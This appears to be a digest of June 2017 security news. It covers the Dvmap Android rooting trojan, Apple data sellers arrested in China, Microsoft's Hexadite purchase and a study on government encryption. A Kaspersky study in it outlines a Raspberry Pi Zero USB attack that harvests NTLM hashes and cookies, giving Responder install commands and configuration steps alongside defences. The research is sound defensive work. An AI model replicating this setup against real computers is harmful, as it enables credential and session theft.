Apple rovněž postupně končí podporu 32bitu pro Macy a OS High Sierra bude posledním, který bude pro dané prostředí způsobilý. Od června 2018 tak budou muset všechny nové aplikace pro Mac v App storu podporovat 64bit.

22 Apple Distributors Arrested for Selling Customers’ Data in $7.4 Million
9.6.2017 thehackernews Apple
Image Source: South China Morning Post
Chinese authorities have announced the arrest of around 22 distributors working as Apple distributors as part of a $7 million operation, who stole customers’ personal information from an internal Apple database and illegally sold it to Chinese black market vendors.
According to a report from Chinese media, this underground network reportedly consisted of employees working in direct Apple suppliers, and other outsource firms in the Zhejiang, a province in eastern China.
These employees had access to Apple databases along with other tools containing sensitive information about its customers.
They allegedly used their company's internal computer system to gather data includes usernames, email addresses, phone numbers, and Apple IDs, and then sold it in the underground market for between 10 yuan ($1.47) and 80 yuan ($11.78) per data point.
So far, the network has made a total of 50 million yuan (around $7.36 million). However, it is unclear if the data sold by the suspects belonged to only Chinese Apple users or users elsewhere as well.
apple-store-data-sell
Much details about the arrest have not been revealed by the Chinese authorities at this moment, though the police statement suggests the Chinese authorities across four provinces, including Guangdong, Jiangsu, Zhejiang, and Fujian, arrested 22 suspects over the weekend, following a few months of investigation.
The authorities dismantled their online network and seized all "criminal tools," and announced Thursday that the suspects have been "detained on suspicion of infringing individuals’ privacy and illegally obtaining their digital personal information."
Wondering how this spamming operation can affect you?
As I mentioned above, your personal data is profitable both for marketing companies to deliver targeted advertisements to you, and for hackers to carry out malicious hacking campaigns, including phishing attacks and other email scams.
Police are trying to capture and destroy the scammers' network, but users are advised to be vigilant while opening attachments in emails, clicking links in messages from unknown numbers and giving out any details on phone calls.

First Android-Rooting Trojan With Code Injection Ability Found On Google Play Store
9.6.2017 thehackernews Android
A new Android-rooting malware with an ability to disable device’ security settings in an effort to perform malicious tasks in the background has been detected on the official Play Store.
What's interesting? The app was smart enough to fool Google security mechanism by first pretending itself to be a clean app and then temporarily replacing it with a malicious version.
Security researchers at Kaspersky Lab discovered a new piece of Android rooting malware that was being distributed as gaming apps on the Google Play Store, hiding behind puzzle game "colourblock," which was being downloaded at least 50,000 times prior to its removal.
Dubbed Dvmap, the Android rooting malware disables device's security settings to install another malicious app from a third-party source and also injects malicious code into the device system runtime libraries to gain root access and stay persistent.
"To bypass Google Play Store security checks, the malware creators used a very interesting method: they uploaded a clean app to the store at the end of March, 2017, and would then update it with a malicious version for short period of time," the researchers said.
"Usually they would upload a clean version back on Google Play the very same day. They did this at least 5 times between 18 April and 15 May."
Here's How Dvmap Malware Works
android-rooting-malware-app-google-play-store
Dvmap Trojan works on both 32-bit and 64-bit versions of Android, which once installed, attempts to gain root access on the device and tries to install several modules on the system including a few written in Chinese, along with a malicious app called "com.qualcmm.timeservices."
To make sure the malicious module gets executed with system rights, the malware overwrites system's runtime libraries depending on which Android version the device is running.
To complete the installation of the above-mentioned malicious app, the Trojan with system rights turns off "Verify Apps," feature and modify system setting to allow app installation from 3rd party app stores.
"Furthermore, it can grant the "com.qualcmm.timeservices" app Device Administrator rights without any interaction with the user, just by running commands. It is a very unusual way to get Device Administrator rights," the researchers said.
This malicious 3rd party app is responsible for connecting the infected device to the attacker's command-and-control server, giving out full control of the device into the hands of attackers.
However, the researchers said, they haven't noticed any commands received by the infected Android devices so far, so it's unclear "what kind of files will be executed, but they could be malicious or advertising files."
How to Protect Yourself Against Dvmap Malware
Researchers are still testing the Dvmap malware, but meanwhile, advise users who installed the puzzle game in question to back up their device's data and perform a full factory data reset in an effort to mitigate the malware.
To prevent yourself from being targeted by such apps, always beware of fishy apps, even when downloading from Google Play Store, and try to stick to the trusted brands only. Moreover, always look at the comments left by other users.
Always verify app permissions before installing any app and grant only those permissions which have relevant context for the app's purpose.
Last but not the least, always keep a good antivirus app on your device that can detect and block such malware before it can infect your device and keep it up-to-date.

50 hashes per hour
8.6.2017 Kaspersky Apple
How often do you turn off your computer when you go home from work? We bet you leave it on so you don’t have to wait until it boots up in the morning. It’s possible that your IT staff have trained you to lock your system for security reasons whenever you leave your workplace. But locking your system won’t save your computer from a new type of attack that is steadily gaining popularity on Raspberry Pi enthusiast forums.

We previously investigated the security of charging a smartphone via a USB port connection. In this research we’ll be revisiting the USB port – this time in attempts to intercept user authentication data on the system that a microcomputer is connected to. As we discovered, this type of attack successfully allows an intruder to retrieve user authentication data – even when the targeted system is locked. It also makes it possible to get hold of administrator credentials. Remember Carbanak, the great bank robbery of 2015, when criminals were able to steal up to a billion dollars? Finding and retrieving the credentials of users with administrative privileges was an important part of that robbery scheme.

In our research we will show that stealing administrator credentials is possible by briefly connecting a microcomputer via USB to any computer within the corporate perimeter. By credentials in this blogpost we mean the user name and password hash and we won’t go into detail how to decipher the retrieved hash, or how to use it in the pass-the-has types of attacks. What we’re emphasizing is that the hardware cost of such an attack is no more than $20 and it can be carried out by a person without any specific skills or qualifications. All that’s needed is physical access to corporate computers. For example, it could be a cleaner who is asked to plug “this thing” into any computer that’s not turned off.

We used a Raspberry Pi Zero in our experiments. It was configured to enumerate itself as an Ethernet adapter on the system it was being plugged into. This choice was dictated by the popularity of Raspberry Pi Zero mentions on forums where enthusiasts discuss the possibility of breaking into information systems with single-board computers. This popularity is understandable, given the device capabilities, size and price. Its developers were able to crank the chip and interfaces into a package that is slightly larger than an ordinary USB flash drive.

Yes, the idea of using microcomputers to intercept and analyze network packets or even as a universal penetration testing platform is nothing new. Most known miniature computing devices are built on ARM microprocessors, and there is a special build of Kali Linux that is specifically developed for pen testing purposes.

There are specialized computing sticks that are designed specifically for pen testing purposes, for example, USB Armory. However, with all its benefits, like integrated USB Type A connector (Raspberry Pi requires an adapter), USB Armory costs much more (around $135) and absolutely pales in comparison when you look at its availability vs. Raspberry Pi Zero. Claims that Raspberry Pi can be used to steal hashes when connected via USB to a PC or Mac surfaced back in 2016. Soon there were claims that Raspberry Pi Zero could also be used for stealing cookies fromh3 browsers – something we also decided to investigate.

So, armed with one of the most widespread and available microcomputers at the moment, we conducted two series of experiments. In the first, we attempted to intercept user credentials within the corporate network, trying to connect to laptop and desktop computers running different operating systems. In the second, we attempted to retrieve cookies in a bid to restore the user session on a popular website.

Experiment 1: stealing domain credentials

Methodology

The key principle behind this attack is emulation of the network adapter. We had absolutely no difficulties in finding the module emulating the Ethernet adapter under Raspbian OS (for reference, at the time of writing, we hadn’t found a similar module for Kali Linux). We made a few configuration changes in the cmdline.txt and config.txt files to load the module on boot.

A few extra steps included installing the python interpreter, sqlite3 database library and a special app called Responder for packet sniffing:

apt-get install -y python git python-pip python-dev screen sqlite3
pip install pycrypto
git clone https://github.com/spiderlabs/responder

And that wasn’t all – we set up our own DHCP server where we defined the range of IP addresses and a mask for a subnet to separate it from the network we’re going to peer into. The last steps included configuring the usb0 interface and automatic loading of Responder and DHCP server on boot. Now we were ready to rock.

Results

Just as soon as we connected our “charged” microcomputer to Windows 10, we saw that the connected Raspberry Pi was identified as a wired LAN connection. The Network Settings dialogue shows this adapter as Remote NDIS Internet sharing device. And it’s automatically assigned a higher priority than others.

Responder scans the packets that flow through the emulated network and, upon seeing the username/password hash pairs, directs them to a fake HTTP/HTTPS/NTLM (it supports v1 and v2) server. The attack is triggered every time applications, including those running in the background, send authentication data, or when a user enters them in the standard dialogue windows in the web browser – for example, when user attempts to connect to a shared folder or printer.

Intercepting the hash in automatic mode, which is effective even if the system is locked, only works if the computer has another active local network connection.

As stated above, we tried this proof of concept in three scenarios:

Against a corporate computer logged into a domain
Against a corporate computer on a public network
Against a home computer
In the first scenario we found that the device managed to intercept not only the packets from the system it’s connected to via USB but also NTLM authentication requests from other corporate network users in the domain. We mapped the number of intercepted hashes against the time elapsed, which is shown in the graph below:

Playing around with our “blackbox” for a few minutes, we got proof that the longer the device is connected, the more user hashes it extracts from the network. Extrapolating the “experimental” data, we can conclude that the number of hashes it can extract in our setting is around 50 hashes per hour. Of course, the real numbers depend on the network topology, namely, the amount of users within one segment, and their activity. We didn’t risk running the experiment for longer than half an hour because we also stumbled on some peculiar side effects, which we will describe in a few moments.

The extracted hashes are stored in a plain-text file:

In the second scenario we were only able to extract the connected system’s user credentials: domain/Windows name and password hash. We might have gotten more if we had set up shared network resources which users could try to access, but we’re going to leave that outside the scope of this research.

In the third scenario, we could only get the credentials of the owner of the system, which wasn’t connect to a domain authentication service. Again, we assume that setting up shared network resources and allowing other users to connect to them could lead to results similar to those we observed in the corporate network.

The described method of intercepting the hashes worked on Mac OS, too. When we tried to reach an intranet site which requires entering a domain name, we saw this dialogue warning that the security certificate is invalid.

Now, the interesting side effect we mentioned above was that when the device was connected to a[ny] system in the network, tasks sent out to the network printer from other machines in the same network were put on hold in the printer queue. When the user attempted to enter the credentials in the authentication dialogue window, the queue didn’t clear. That’s because these credentials didn’t reach the network printer, landing in the Raspberry Pi’s flash memory instead. Similar behavior was observed when trying to connect to remote folders via the SMB protocol from a Mac system.

Bonus: Raspberry Pi Zero vs. Raspberry Pi 3

Once we saw that the NTLM systems of both Windows and Mac had come under attack from the microcomputer, we decided to try it against Linux. Furthermore, we decided to attack the Raspberry Pi itself, since Raspbian OS is built on the Debian Weezy core.

We reproduced the experiment, this time targeting Raspberry Pi 3 (by the way, connecting it to the corporate network was a challenging task in itself, but doable, so we won’t focus on it here). And here we had a pleasant surprise – Raspbian OS resisted assigning the higher priority to a USB device network, always choosing the built-in Ethernet as default. In this case, the Responder app was active, but could do nothing because packets didn’t flow through the device. When we manually removed the built-in Ethernet connection, the picture was similar to that we had observed previously with Windows.

Similar behavior was observed on the desktop version of Debian running on Chromebook – the system doesn’t automatically set the USB Ethernet adapter as default. Therefore, if we connect Raspberry Pi Zero to a system running Debian, the attack will fail. And we don’t think that creating Raspberry Pi-in-the-middle attacks is likely to take off, because they are much harder to implement and much easier to detect.

Experiment 2: stealing cookies

Methodology

While working on the first experiment, we heard claims that it’s possible to steal cookies from a PC when a Raspberry Pi Zero is connected to it via USB. We found an app called HackPi, a variant of PoisonTap (an XSS JavaScript) with Responder, which we described above.

The microcomputer in this experiment was configured just like in the previous one. HackPi works even better at establishing itself as a network adapter because it has an enhanced mechanism of desktop OS discovery: it is able to automatically install the network device driver on Windows 7/8/10, Mac and –nix operating systems. While in the first series of experiments, an attack could fail on Windows 7, 8 or Vista if the Remote NDIS Internet sharing device didn’t install itself automatically (especially when the PC is locked). And, unlike in the previous series, HackPi never had trouble assigning itself the default network adapter priority under Mac OS either.

What differs from the first experiment is that the cookies are stolen using the malicious Java Script launched from the locally stored web page. If successful, PoisonTap’s script saves the cookies intercepted from sites, a list of which is also locally stored.

Results

If the computer is not locked and the user opens the browser, Java Script initiates the redirecting of web requests to a malicious local web page. Then the browser opens the websites from the previously defined list. It is indeed quite spectacular:

If the user does nothing, Raspberry Pi Zero launches the default browser with URL go.microsoft.com in the address line after a short timeout. Then the process goes ahead as described. However, if the default browser has no cookies in the browser history, the attackers gain nothing.

Among the sites we’ve seen in the list supplied with the script were youtube.com, google.com, vk.com, facebook.com, twitter.com, yandex.ru, mail.ru and over 100 other web addresses. This is what the log of stolen cookies looks like:

We checked the validity of stolen cookies using the pikabu.ru website as an example by pasting the info into a clean browser field on other machines and were able to get hold of the user’s account along with all the statistics. On another website belonging to a railroad company vending service, we were able to retrieve the user’s token and take over the user’s account on another computer, because authentication protocol used only one LtpaToken2 for session identification.

Now this is more serious, because in this case the criminals can get information about previous orders made by the victim, part of their passport number, name, date of birth, email and phone number.

One of the strong points of this attack is that enthusiasts have learned how to automatically install the network device driver on all systems found in today’s corporate environments: Windows 7/8/10, Mac OS X. However, this scenario doesn’t work against a locked system – at least, for now. But we don’t think you should become too complacent; we assume it’s only a matter of time before the enthusiasts overcome this as well. Especially given that the number of these enthusiasts is growing every day.

Also, the malicious web page is blocked by all Kaspersky Lab products, which detect it as Trojan.JS.Poisontap.a. We also assume that this malicious web page will be blocked by the products of all other major anti-malware vendors.

Conclusions

There is already a wide array of single-board microcomputers: from the cheap and universal Raspberry Pi Zero to computing sticks specifically tuned for penetration testing, which cannot be visually differentiated from USB flash drives. To answer the main question of just how serious this threat is, we can say that at the moment it is overrated. However, we don’t advise underestimating the capabilities of IoT enthusiasts and it’s better to assume that those obstacles which we discovered in our experiment, have already been overcome.

Right now we can say that Windows PCs are the systems most prone to attacks aimed at intercepting the authentication name and password with a USB-connected Raspberry Pi. The attack works even if the user doesn’t have local or system administrator privileges, and can retrieve the domain credentials of other users, including those with administrator privileges. And it works against Mac OS systems, too.

The second type of attack that steals cookies only works (so far) when the system is unlocked, which reduces the chances of success. It also redirects traffic to a malicious page, which is easily blocked by a security solution. And, of course, stolen cookies are only useful on those websites that don’t employ a strict HTTP transport policy.

Recommendations

However, there are a number of recommendations we’d like to give you to avoid becoming easy prey for attackers.

Users

1. Never leave your system unlocked, especially when you need to leave your computer for a moment and you are in a public place.

2. On returning to your computer, check to see if there are any extra USB devices sticking out of your ports. See a flash drive, or something that looks like a flash drive? If you didn’t stick it in, we suggest you remove it immediately.

3. Are you being asked to share something via external flash drive? Again, it’s better to make sure that it’s actually a flash drive. Even better – send the file via cloud or email.

4. Make a habit of ending sessions on sites that require authentication. Usually, this means clicking on a “Log out” button.

5. Change passwords regularly – both on your PC and the websites you use frequently. Remember that not all of your favorite websites may use mechanisms to protect against cookie data substitution. You can use specialized password management software for easy management of strong and secure passwords, such as the free Kaspersky Password Manager.

6. Enable two-factor authentication, for example, by requesting login confirmation or with a hardware token.

7. Of course, it’s strongly recommended to install and regularly update a security solution from a proven and trusted vendor.

Administrators

1. If the network topology allows it, we suggest using solely Kerberos protocol for authenticating domain users. If, however, there is a demand for supporting legacy systems with LLNMR and NTLM authentication, we recommend breaking down the network into segments, so that even if one segment is compromised, attackers cannot access the whole network.

2. Restrict privileged domain users from logging in to the legacy systems, especially domain administrators.

3. Domain user passwords should be changed regularly. If, for whatever reason, the organization’s policy does not involve regular password changes, please change the policy. Like, yesterday.

4. All of the computers within a corporate network have to be protected with security solutions and regular updates should be ensured.

5. In order to prevent the connection of unauthorized USB devices, it can be useful to activate a Device Control feature, available in the Kaspersky Endpoint Security for Business suite.

6. If you own the web resource, we recommend activating the HSTS (HTTP strict transport security) which prevents switching from HTTPS to HTTP protocol and spoofing the credentials from a stolen cookie.

7. If possible, disable the listening mode and activate the Client (AP) isolation setting in Wi-Fi routers and switches, disabling them from listening to other workstations’ traffic.

8. Activate the DHCP Snooping setting to protect corporate network users from capturing their DHCP requests by fake DHCP servers.

Last, but not least, you never know if your credentials have been leaked from a site you’ve been to before – online or physical. Thus, we strongly recommend that you check your credentials on the HaveIbeenPwned website to be sure.

Dvmap: the first Android malware with code injection
8.6.2017 Kaspersky Android
In April 2017 we started observing new rooting malware being distributed through the Google Play Store. Unlike other rooting malware, this Trojan not only installs its modules into the system, it also injects malicious code into the system runtime libraries. Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a.

The distribution of rooting malware through Google Play is not a new thing. For example, the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016. But Dvmap is very special rooting malware. It uses a variety of new techniques, but the most interesting thing is that it injects malicious code into the system libraries – libdmv.so or libandroid_runtime.so.

This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime, and it has been downloaded from the Google Play Store more than 50,000 times. Kaspersky Lab reported the Trojan to Google, and it has now been removed from the store.

Trojan.AndroidOS.Dvmap.a on Google Play

To bypass Google Play Store security checks, the malware creators used a very interesting method: they uploaded a clean app to the store at the end of March, 2017, and would then update it with a malicious version for short period of time. Usually they would upload a clean version back on Google Play the very same day. They did this at least 5 times between 18 April and 15 May.

All the malicious Dvmap apps had the same functionality. They decrypt several archive files from the assets folder of the installation package, and launch an executable file from them with the name “start.”

Encrypted archives in the assets folder

The interesting thing is that the Trojan supports even the 64-bit version of Android, which is very rare.

Part of code where the Trojan chooses between 32-bit and 64-bit compatible files

All encrypted archives can be divided into two groups: the first comprises Game321.res, Game322.res, Game323.res and Game642.res – and these are used in the initial phase of infection, while the second group: Game324.res and Game644.res, are used in the main phase.

Initial phase

During this phase, the Trojan tries to gain root rights on the device and to install some modules. All archives from this phase contain the same files except for one called “common”. This is a local root exploit pack, and the Trojan uses 4 different exploit pack files, 3 for 32-bit systems and 1 for 64-bit-systems. If these files successfully gain root rights, the Trojan will install several tools into the system. It will also install the malicious app “com.qualcmm.timeservices.”

These archives contain the file “.root.sh” which has some comments in Chinese:

Part of .root.sh file

Main phase

In this phase, the Trojan launches the “start” file from Game324.res or Game644.res. It will check the version of Android installed and decide which library should be patched. For Android 4.4.4 and older, the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from libdvm.so, and for Android 5 and newer it will patch method nativeForkAndSpecialize from libandroid_runtime.so. Both of these libraries are runtime libraries related to Dalvik and ART runtime environments. Before patching, the Trojan will backup the original library with a name bak_{original name}.

Patched libdvm.so

During patching, the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip. This could be very dangerous and cause some devices to crash following the overwrite. Then the Trojan will put the patched library back into the system directory. After that, the Trojan will replace the original /system/bin/ip with a malicious one from the archive (Game324.res or Game644.res). In doing so, the Trojan can be sure that its malicious module will be executed with system rights. But the malicious ip file does not contain any methods from the original ip file. This means that all apps that were using this file will lose some functionality or even start crashing.

Malicious module “ip”

This file will be executed by the patched system library. It can turn off “VerifyApps” and enable the installation of apps from 3rd party stores by changing system settings. Furthermore, it can grant the “com.qualcmm.timeservices” app Device Administrator rights without any interaction with the user, just by running commands. It is a very unusual way to get Device Administrator rights.

Malicious app com.qualcmm.timeservices

As I mentioned before, in the “initial phase”, the Trojan will install the “com.qualcmm.timeservices” app. Its main purpose is to download archives and execute the “start” binary from them. During the investigation, this app was able to successfully connect to the command and control server, but it received no commands. So I don’t know what kind of files will be executed, but they could be malicious or advertising files.

Conclusions

This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques, including patching system libraries. It installs malicious modules with different functionality into the system. It looks like its main purpose is to get into the system and execute downloaded files with root rights. But I never received such files from their command and control server.

These malicious modules report to the attackers about every step they are going to make. So I think that the authors are still testing this malware, because they use some techniques which can break the infected devices. But they already have a lot of infected users on whom to test their methods.

I hope that by uncovering this malware at such an early stage, we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods.

MD5

43680D1914F28E14C90436E1D42984E2
20D4B9EB9377C499917C4D69BF4CCEBE

Android Malware 'Dvmap' Delivered via Google Play

8.6.2017 securityweek Android
Researchers at Kaspersky Lab recently came across a new Trojan designed to target Android smartphones. The malware, delivered via the Google Play store, is capable of rooting devices and it leverages some new techniques to achieve its goal.

The Trojan, dubbed “Dvmap” by Kaspersky, was uploaded to Google Play disguised as various apps, such as a simple puzzle game. The security firm said the malicious apps were downloaded from the official Android app store more than 50,000 times before being removed by Google.

It’s not uncommon for malware to make its way into Google Play. In the case of Dvmap, cybercriminals uploaded a clean application at the end of March and then, on five separate occasions between April 18 and May 15, they pushed malicious updates that were available for only a short period of time.

By keeping the malicious version on Google Play only for a short amount of time – the clean version would typically be re-uploaded on the same day – the attackers managed to evade detection by Google’s security systems.

Once it infects a device, the malware, which works on both 32-bit and 64-bit versions of Android, uses a local root exploit pack to obtain root privileges. If the smartphone has been successfully rooter, several modules are installed on the system.

It’s not uncommon for rooting malware to install modules on the targeted device, but Dvmap has another trick up its sleeve. The Trojan, whose code includes comments written in Chinese, also injects malicious code into system runtime libraries, and experts believe it’s the first piece of Android malware to do this.

The code injection takes place in the main phase of the attack, when the malware patches one of two runtime libraries – either libdvm.so or libandroid_runtime.so, depending on the version of Android present.

Dvmap replaces legitimate code with malicious code in order to execute its modules. However, this can also cause some legitimate apps to crash or stop functioning properly.

The malicious code executes a file that turns off the Verify Apps feature in Android to allow the installation of apps from third-party stores. It can also provide Device Administrator rights to an installed app whose purpose is to download other files.

The command and control (C&C) server did not send any files during Kaspersky’s tests so it’s unclear what types of files have been delivered, but researchers believe it’s either other malware or adware.

Judging by the fact that some of the techniques used by Dvmap can break infected devices, experts believe the cybercriminals are still testing the malware. However, given the large number of users who have already downloaded it from Google Play, they have plenty of devices to perform tests on.

Arrest in NSA News Leak Fuels Debate on Source Protection

8.6.2017 securityweek BigBrothers
It was a major scoop for The Intercept -- documents suggesting a concerted Russian effort to hack US election systems -- but the online news site is drawing fire in media circles following the arrest of the alleged source of the leak.

The Intercept, the investigative arm of the First Look Media organization created by eBay founder Pierre Omidyar, is being criticized for sharing information which may have led to the arrest this week of National Security Agency contractor Reality Leigh Winner.

Winner, 25, was arrested and accused of mailing classified NSA documents to "a news outlet," according to the US Justice Department, which said an investigation showed she had printed and shared the investigative report.

Did the news organization unwittingly provide clues to the government that led authorities to Winner? Some media analysts say the journalists were careless at best.

Some of the harshest criticism came from Washington Post reporter Barton Gellman, who called the case a "catastrophic failure of source protection" and argued that The Intercept "made egregious mistakes that doomed its source."

"It handed USG (US government) a color copy of original doc & told a clearance-holding contractor the doc was mailed from Augusta. Where source lived," tweeted Gellman, a two-time Pulitzer Prize winner who was part of a team reporting from documents leaked by former NSA contractor Edward Snowden.

Jake Swearingen, a technology writer for New York Magazine, said Winner made her own missteps by printing the documents in a way that could be tracked and mailing them to The Intercept.

But Swearingen added that The Intercept may have sealed Winner's fate by showing the document to a government official as part of an effort to verify its authenticity.

"It's quite reasonable for The Intercept to seek confirmation," Swearingen wrote. "But revealing the Augusta, Georgia, postmark to the third-party source clearly helped the government build its case."

The Intercept said in a statement the NSA document "was provided to us completely anonymously" and added that "we have no knowledge of the identity of the person who provided us with the document."

The news organization, which is headed by investigative reporter Glenn Greenwald, who was part of the team that first published the Snowden documents, cautioned against drawing any conclusions from FBI assertions on how it tracked Winner.

"Winner faces allegations that have not been proven. The same is true of the FBI’s claims about how it came to arrest Winner," the statement said.

- Connecting the dots -

Robert Graham of Errata Security said Winner may have been tracked by nearly invisible dots from the printer used that can determine who used the machine.

"Because the NSA logs all printing jobs on its printers, it can use this to match up precisely who printed the document," Graham said in a blog post.

"When they print things out, they includes these invisible dots, so documents can be tracked," Graham wrote, calling it "a violation of our (constitutional) rights."

Dan Gillmor, an Arizona State University journalism professor who blogs about media, said the case calls for more scrutiny.

"Hoping @theintercept will do a thorough self-examination of its source protection, or lack of it -- and make results loudly public."

Some were less charitable.

John Kiriakou, a former CIA analyst who went to jail after leaking information on US torture and waterboarding, tweeted "@theintercept should be ashamed of itself. (Reporter) Matthew Cole burns yet another source. It makes your entire organization untrustworthy."

WikiLeaks, the organization which is a conduit for secret documents, said it was offering a $10,000 reward "for information leading to the public exposure & termination of this 'reporter.'"

Others said the focusing on the role of the news organization distracts from the more question of whether the leak related to an important public issue.

Snowden, who has been given asylum in Russia and is also facing prosecution for divulging secret documents, said it is inappropriate to use the Espionage Act to prosecute "whistleblowers" who reveal important news to media.

"The prosecution of any journalistic source without due consideration by the jury as to the harm or benefit of the journalistic activity is a fundamental threat to the free press," Snowden said in a blog post.

Dan Kennedy, a Northeastern University journalism professor, said most sources of leaked information understand they will eventually face consequences.

Winner "does have an argument to make that what she did was in the public interest, but I don't know if she can convince a jury of that," Kennedy said.

Microsoft Acquires Security Orchestration Firm Hexadite

8.6.2017 securityweek IT
Microsoft announced on Thursday that it has agreed to acquire Boston-based security orchestration firm Hexadite for an undisclosed sum.

Hexadite’s flagship Automated Incident Response Solution (AIRS™) solution is described by the company as a tool “modeled after the investigative and decision-making skills of top cyber analysts and driven by artificial intelligence.”

“By eliminating the need to tune down alert volume, Hexadite allows your existing security investments to operate at full capacity and deliver maximum value,” Hexadite explains. “Hexadite AIRS integrates with any detection system via email, syslog or APIs to expedite deployment and investigate every alert.”

HexaditeMicrosoft says that acquisition will build on its current initiatives to help businesses using Windows 10 detect, investigate and respond to advanced attacks on their networks with Windows Defender Advanced Threat Protection (WDATP).

“Microsoft is strengthening its Advanced Threat Protection offering by adding artificial intelligence-based automatic investigation and remediation capabilities, making response and remediation faster and more effective,” the company said in the announcement. “With Hexadite, WDATP will include endpoint security automated remediation, while continuing the incredible growth in activations of WDATP, which now protects almost 2 million devices.”

“Our vision is to deliver a new generation of security capabilities that helps our customers protect, detect and respond to the constantly evolving and ever-changing cyberthreat landscape,” said Terry Myerson, executive vice president, Windows and Devices Group, Microsoft. “Hexadite’s technology and talent will augment our existing capabilities and enable our ability to add new tools and services to Microsoft’s robust enterprise security offerings.”

Hexadite has raised more than $21 million in funding since being founded in 2014. Rumors of the acquisition surfaced late last month, but the official announcement confirming the deal came on June 8.

Honeywell to Open Industrial Cyber Security Center Singapore

8.6.2017 securityweek Cyber
Industrial giant Honeywell said on Thursday that it will establish a new industrial cyber security center of excellence (COE) for Asia Pacific in Singapore.

Scheduled to open by the end of 2017, Honeywell says the facility will feature a cyber security research and development lab, an advanced training facility and a security operations center (SOC) to support its managed security services.

Honeywell Logo"Honeywell's major investments in new industrial cyber security technologies, services, and advanced research – including this new center of excellence in Singapore – will further strengthen our ability to secure and protect industrial assets, operations and people," said Jeff Zindel, vice president and general manager, Honeywell Industrial Cyber Security. "The COE will provide a world-class innovation platform for smart industry, critical infrastructure protection and securing the Industrial Internet of Things (IIoT) in the Asia Pacific region."

The new facility in Singapore, which is the first for the Asia Pacific region, is a further expansion of Honeywell's global network of innovation centers—the first which is based in Atlanta, USA.

According to the company, the new lab will be used for research and development of new cyber security technologies and products, hands-on training and certifications, and testing and validation of industrial cyber security solutions.

"As part of Singapore's push toward Advanced Manufacturing and a digital economy, EDB has been actively partnering with the industrial and infrastructural sectors to embrace the potential of digitalization," said Ms. Fong Pin Fen, director for Cities, Infrastructure & Industrial Solutions at EDB. "A key component of success in our efforts is cyber security. Critical systems will have to be protected and on this note, we are pleased to support Honeywell in the opening of its new Industrial Cyber Security COE, which will help the industry remain secure as it embarks on its digital transformation."

The COE will be located at Honeywell's office in Singapore's Changi Business Park and is expected to open by the end of 2017.

Honeywell said it plans to open a similar facility in Dubai later this year.

In April, Honeywell launched Secure Media Exchange (SMX), a new product designed to protect industrial facilities from USB-borne threats by providing a simple way for organizations to track the removable media devices connected to their systems.

In February 2016, Honeywell's Industrial Cyber Security division established a partnership with firewall maker Palo Alto Networks, under which Honeywell offers Palo Alto Networks’ Next-Generation Security Platform to customers that operate industrial facilities and critical infrastructure environments.

ICIT Calls for Legislation to Enforce Encryption on Government Agencies

8.6.2017 securityweek BigBrothers

The starting point for a new study from the Institute for Critical Infrastructure Technology is not new: "There are only two types of networks, those that have been compromised and those that are compromised without the operator's awareness." Since it is impossible to defend the network, the solution is surely to defend the data. Here encryption can offer something more like a guarantee of security.

The study (PDF) is primarily directed at government networks, where it suggests "federal government breaches have eroded the public's confidence in the federal entities' ability to secure sensitive systems and data against adversarial compromise."

But just as it is self-evident that networks are regularly breached, so it is self-evident that encryption is not always used. An example presented by the study, that both demonstrates the absence of encryption and the misguided argument for not using it, can be found in the massive OPM breach of 2015. Here a series of breaches led to the theft of 4.2 million personal records and 21.5 million SF-86 forms -- the effect of which may be felt for many years to come.

OPM did not use best security practices. Most shockingly, the stolen data had not been encrypted. According to former OPM Chief Information Officer Donna Seymour, "Some legacy systems may not be capable of being encrypted." It is this supposition and attitude that the report's author, James Scott, says is not correct.

"Data," he claims, "can be encrypted on both legacy and modern systems using advanced encryption methodologies such as the Format Preserving Encryption (FPE) derivative of the AES algorithm."

But he takes his argument one step further: "Since agencies and other public entities have habitually failed to secure citizens' data, legislators and regulators must intervene to ensure that local, state, and federal entities possess the resources to secure and eventually modernize their architectures, and they must mandate that organizations secure data at-rest, in-transit, and during-processing to the best of their capabilities, according to available technologies, such as Format Preserving Encryption, and according to established legislation and regulation."

This is a complex issue. Security heads in government agencies are already required to update antiquated (legacy) systems, and to employ best security practices. Agency heads, says last month's presidential cybersecurity executive order, will "be held accountable by the President for ensuring that cybersecurity risk management processes are aligned with strategic, operational, and budgetary planning processes, in accordance with chapter 35, subchapter II of title 44, United States Code."

It is noticeable, that the executive order never once specifies the use of encryption. Is this an oversight; is it not considered as important as the ICIT claims; or is it simply too difficult or too costly for government agencies? Or is the use of encryption already implied in this and other existing requirements for government agencies?

Certainly, it is already required. "Federal agencies are required to use encryption by the Cybersecurity Act of 2015," Luther Martin, distinguished technologist at HPE, told SecurityWeek. "They use it, but not in meaningful ways. The main threats that they face are APT/malware. The main types of encryption that they use are TLS, full-disk encryption and transparent database encryption, none of which do anything useful against APT/malware."

This could have been rectified in the executive order, but was not. "For the Trump EO," continued Martin, "remember that encryption is a niche within a niche, security being a small part of IT spending and encryption being a small part of security spending. So, the most likely explanation is that it's just too small of a part to worry about at that level."

This view is supported by Ted Pretty, CEO and MD at Covata. "Encryption is a very powerful security tool, but is one part of an overall regime of security controls," he told SecurityWeek. "There may be other ways of mitigating risk that better suit some systems -- for example, better authentication and policy controls -- and this is probably why the executive order did not specifically reference encryption. Perhaps the reference to systems also refers to system condition at the network, infrastructure, platform and data level."

But the two basic arguments of the ICIT paper remain. Is FPE the right and adequate solution for legacy government databases, and should comparable encryption be explicitly required by law?

The advantage of FPE, suggests ICIT, is that it can granularly encrypt individual fields without altering the basic data format. This means that data can be moved between different databases while still encrypted. Furthermore, "FPE can leave a small portion of the data deciphered so that it can be used for identification and processing, but it cannot be used to compromise the user. A familiar example of this is being able to see the last four digits of the SSN or credit card number in private sector transactions. The government sector can similarly de-identify sensitive information without necessarily overhauling existing infrastructure."

Is this the right solution? "Yes," says Martin. "FPE really is as good as it sounds. Legacy environments are tricky and expensive to deal with. Perhaps very tricky and very expensive. Using FPE lets you adapt the data to the network instead of adapting the network to the encrypted data. If you're lucky enough to have an all-post-dot-com IT infrastructure then FPE may not matter to you. But to most of the world, it's a fantastic innovation."

